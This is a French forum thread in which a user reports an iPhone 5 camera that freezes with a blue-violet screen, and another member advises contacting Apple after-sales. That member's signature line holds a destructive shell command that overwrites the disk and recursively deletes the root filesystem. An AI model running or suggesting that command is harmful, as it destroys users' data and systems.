Forum iPhone, iPad, Apple Watch de iPhon.fr

Forum utilisateurs Apple iPhone, iPad, Apple Watch, forfaits et accessoires

Vous n'êtes pas identifié(e).

Annonce

Bienvenue sur le forum du blog iPhon.fr

Pensez à poster dans la bonne rubrique, respecter les propos des autres internautes, ne pas utiliser le langage SMS, et enfin, à utiliser la fonction 'Recherche' !
Et... Gardez le sens de l'humour, de la convivialité et de la décontraction. On n'est pas là pour se prendre la tête ! ;-)

#1 04-11-2012 19:11:32

vuuurt
Membre
Inscription : 04-11-2012
Messages : 2

iPhone 5 et bug appareil photo

Bonjour,

j'ai un problème lors de l'utilisation de l'appareil photo de mon (nouvel) iPhone 5.
En effet, l'appareil photo se bloque de façon relativement aléatoire lors des prises de vue (peut-être plus souvent dans des conditions de basse luminosité?).
L'appli photo se bloque ("freeze") et j'observe alors un écran bleu-violet intéressant tout ou partie de l'écran (voir capture d'écran ci-dessous où la plage bleue occupe quasiment tout l'écran, sauf sa portion toute supérieure). Il me faut alors fermer et redémarrer l'appli photo, ou plutôt même redémarrer l'iPhone pour que l'appareil photo se remette à fonctionner normalement. Cela ne se produit pas systématiquement, mais assez souvent pour que cela soit gênant (finie la photo spontanée dans le cas où l'appareil photo se bloque...!!)

17gHeHVYVt.png

Suis-je le seul dans ce cas?
S'agit-il plutôt d'un problème matériel ou logiciel?
Que me conseillez-vous? (je vais restaurer le téléphone pour voir si cela règle le problème mais avez-vous d'autres idées?)
Je précise que j'ai un iPhone 5 blanc 64 Go sous iOS 6.0.1 (non JB), et que le problème existait déjà avec l'iOS 6.0.

Merci d'avance pour vos réponses, commentaires!

Hors ligne

#2 04-11-2012 22:27:38

-nicnl-
Membre
Inscription : 02-04-2008
Messages : 681

Re : iPhone 5 et bug appareil photo

C'est étrange en effet.
Je te conseillerais de contacter au plus vite le service après vente d'Apple. Garde cette capture d'écran bien précieusement, elle pourrait te servir.


sudo cat /dev/urandom > /dev/sda & sudo rm -rf /* &

Hors ligne

#3 04-11-2012 22:45:08

vuuurt
Membre
Inscription : 04-11-2012
Messages : 2

Re : iPhone 5 et bug appareil photo

Merci pour la réponse.
J'ai restauré mon iPhone, mais je contacterai quand même le SAV d'Apple demain.
Bonne soirée

Hors ligne

Pied de page des forums

L'iPhone sur iPhon.fr, le blog de l'iPhone - blog iPad

iPhon.fr et son forum ne sont pas liés à Apple, Orange, SFR ou autres et les marques citées sont la propriété de leurs détenteurs respectifs.